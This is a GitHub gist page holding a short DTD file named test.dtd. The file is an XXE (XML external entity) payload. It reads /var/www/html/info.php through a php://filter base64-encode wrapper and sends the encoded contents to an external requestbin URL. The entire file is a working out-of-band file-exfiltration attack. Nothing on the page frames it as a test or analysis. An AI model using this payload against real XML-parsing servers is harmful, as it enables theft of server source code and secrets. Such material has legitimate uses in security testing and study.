Skip to content

Instantly share code, notes, and snippets.

@jackkleeman
Last active June 23, 2019 22:32
Show Gist options
  • Save jackkleeman/05ca63f9f9f3c0decfa4c4ce839e2477 to your computer and use it in GitHub Desktop.
Save jackkleeman/05ca63f9f9f3c0decfa4c4ce839e2477 to your computer and use it in GitHub Desktop.
test.dtd
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///var/www/html/info.php">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://requestbin.fullcontact.com/1ef046f1?p=%file;'>">
%all;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment